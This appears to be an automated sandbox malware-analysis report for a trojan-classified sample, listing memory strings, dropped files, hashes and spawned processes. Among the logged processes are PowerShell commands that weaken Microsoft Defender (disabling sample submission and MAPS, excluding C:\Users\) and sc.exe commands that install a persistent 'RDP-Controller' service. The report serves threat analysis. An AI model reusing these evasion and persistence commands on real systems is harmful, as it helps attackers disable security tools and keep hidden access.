Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1988983984.000002986492C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989320013.000002986496B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
Source: svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526801542.000002986402B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ListSessions.srf
Source: svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526801542.000002986402B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srf
Source: svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srfrf
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srf
Source: svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srf3457
Source: svchost.exe, 00000028.00000002.2526962025.00000298640A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2528684973.0000029864E39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srf
Source: svchost.exe, 00000028.00000003.2192382775.0000029864E89000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2192457979.0000029864E89000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2192566871.0000029864E89000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.2192487068.0000029864E89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srfA7826
Source: svchost.exe, 00000028.00000002.2528684973.0000029864E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srft
Source: svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/didtou.srf
Source: svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getrealminfo.srf
Source: svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2528121324.0000029864937000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getuserrealm.srf
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989320013.000002986496B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989320013.000002986496B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
Source: svchost.exe, 00000028.00000003.1989355515.0000029864927000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srff
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989355515.0000029864927000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989320013.000002986496B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989320013.000002986496B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
Source: svchost.exe, 00000028.00000003.1989355515.0000029864927000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srfX
Source: svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
Source: svchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cpsrf
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989320013.000002986496B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1988983984.000002986492C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989320013.000002986496B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
Source: svchost.exe, 00000028.00000003.2204317355.000002986495A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2529008362.0000029864E7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf?stsft=-Dt2xeh4U8pY5QoSTNt7vYxwogy2Su
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1988983984.0000029864929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989763777.0000029864956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989069790.0000029864952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
Source: svchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600UE
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1988983984.0000029864929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989069790.0000029864952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1988983984.0000029864929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1988983984.0000029864929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989069790.0000029864952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989320013.000002986496B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2528684973.0000029864E16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
Source: svchost.exe, 00000028.00000003.1988983984.000002986492C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfm
Source: svchost.exe, 00000028.00000003.2225363797.000002986496D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfure
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
Source: svchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502R
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1988983984.0000029864929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1988983984.0000029864929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989763777.0000029864956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989069790.0000029864952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1988983984.0000029864929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989069790.0000029864952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
Source: svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=806034
Source: svchost.exe, 00000028.00000003.1989069790.0000029864952000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1988983984.0000029864929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989069790.0000029864952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1988983984.0000029864929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989069790.0000029864952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1988983984.0000029864929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989069790.0000029864952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989239979.0000029864957000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1988983984.0000029864929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989069790.0000029864952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
Source: svchost.exe, 00000028.00000003.1988983984.0000029864929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989069790.0000029864952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
Source: svchost.exe, 00000028.00000002.2526898399.0000029864045000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1988983984.000002986492C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989048987.000002986495A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1988983984.0000029864929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989069790.0000029864952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
Source: svchost.exe, 00000028.00000003.1989281003.0000029864963000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989259240.0000029864940000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000003.1989213625.000002986493B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
Source: svchost.exe, 00000028.00000002.2529607150.0000029864EB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf3
Source: svchost.exe, 00000028.00000002.2526962025.000002986405F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srfer
Source: C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exe Code function: 13_2_00007FF7E3CE929A inet_addr,ntohl
Source: C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exe Code function: 13_2_00007FF7E3CE292E strlen,strcat,strlen,strlen,strlen,strcat,strlen,strlen,strlen,strcat,LogonUserA,GetLastError,CreateProcessAsUserA,GetLastError,CloseHandle,CreateProcessA,GetLastError
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe File deleted: C:\Windows\Temp\miECvZvT
Source: Joe Sandbox View Dropped File: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll A62BDF318386AAAB93F1D25144CFBDC1A1125AAAD867EFC4E49FE79590181EBF
Source: Joe Sandbox View Dropped File: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll 51C131081921626D22FAF44977D5E4DCFE00E5D6CDDEDA877A82F13631BE7C2E
Source: Joe Sandbox View Dropped File: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll ADFE373F98CABF338577963DCEA279103C19FF04B1742DC748B9477DC0156BB4
Source: C:\Windows\System32\icacls.exe Process token adjusted: Security
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 440 -p 7988 -ip 7988
Source: nHqxqt5L.29.dr Static PE information: Number of sections : 11 > 10
Source: miECvZvT.29.dr Static PE information: Number of sections : 11 > 10
Source: cnccli.dll.29.dr Static PE information: Number of sections : 11 > 10
Source: evtsrv.dll.29.dr Static PE information: Number of sections : 11 > 10
Source: libi2p.dll.29.dr Static PE information: Number of sections : 11 > 10
Source: VPIOcgIO.29.dr Static PE information: Number of sections : 11 > 10
Source: UEptccWa.29.dr Static PE information: Number of sections : 11 > 10
Source: TLbqzKsW.29.dr Static PE information: Number of sections : 11 > 10
Source: dwlmgr.dll.29.dr Static PE information: Number of sections : 11 > 10
Source: prgmgr.dll.29.dr Static PE information: Number of sections : 11 > 10
Source: termsrv32.dll.29.dr Static PE information: Number of sections : 11 > 10
Source: x8eec9dQ.29.dr Static PE information: Number of sections : 11 > 10
Source: file.exe Static PE information: Number of sections : 11 > 10
Source: e5xaOqBz.29.dr Static PE information: Number of sections : 11 > 10
Source: rdpctl.dll.29.dr Static PE information: Number of sections : 11 > 10
Source: fQQIqQM0.29.dr Static PE information: Number of sections : 11 > 10
Source: samctl.dll.29.dr Static PE information: Number of sections : 11 > 10
Source: file.exe, 00000006.00000002.1277094021.0000000002C3A000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs file.exe
Source: file.exe, 00000006.00000000.1272581856.0000000000E1C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameLAPLINK.EXE: vs file.exe
Source: file.exe Binary or memory string: OriginalFilenameLAPLINK.EXE: vs file.exe
Source: classification engine Classification label: mal100.troj.evad.winEXE@57/74@1/52
Source: C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exe Code function: 13_2_00007FF7E3CE855D CreateToolhelp32Snapshot,Process32First,Process32Next,GetLastError,GetLastError,GetLastError,OpenProcess,QueryFullProcessImageNameW,GetLastError,CloseHandle,GetLastError,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exe Code function: 13_2_00007FF7E3CE1A19 FindResourceA,LoadResource,GetLastError,GetLastError,GetLastError,GetLastError
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 29_2_00007FF7AABD1DBC strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError
Source: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exe File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8024:120:WilError_03
Source: C:\Windows\System32\WerFault.exe Mutant created: \BaseNamedObjects\Local\SM0:3088:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7952:120:WilError_03
Source: C:\Windows\System32\WerFault.exe Mutant created: \BaseNamedObjects\Local\WERReportingForProcess7988
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7744:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7800:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8068:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7908:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7156:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7856:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:5364:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user~1\AppData\Local\Temp\sobuolvnbi3uboa4e.bat
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k "C:\Users\user~1\AppData\Local\Temp\sobuolvnbi3uboa4e.bat"
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exe File read: C:\Users\user\AppData\Local\Temp\wfpblk.ini
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: main.exe String found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address.ipp
Source: main.exe String found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v6.ipp
Source: main.exe String found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v4.ipp
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: unknown Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k "C:\Users\user~1\AppData\Local\Temp\sobuolvnbi3uboa4e.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -s W32Time
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exe "C:\Users\user~1\AppData\Local\Temp\lr75sq5smrngkif9fpn.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exe "C:\Users\user~1\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exe"
Source: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exe Process created: C:\Windows\System32\taskkill.exe taskkill.exe /F /FI "SERVICES eq RDP-Controller"
Source: C:\Windows\System32\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exe Process created: C:\Windows\System32\sc.exe sc.exe stop RDP-Controller
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exe Process created: C:\Windows\System32\sc.exe sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exe Process created: C:\Windows\System32\sc.exe sc.exe failure RDP-Controller reset= 1 actions= restart/10000
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exe Process created: C:\Windows\System32\sc.exe sc.exe start RDP-Controller
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
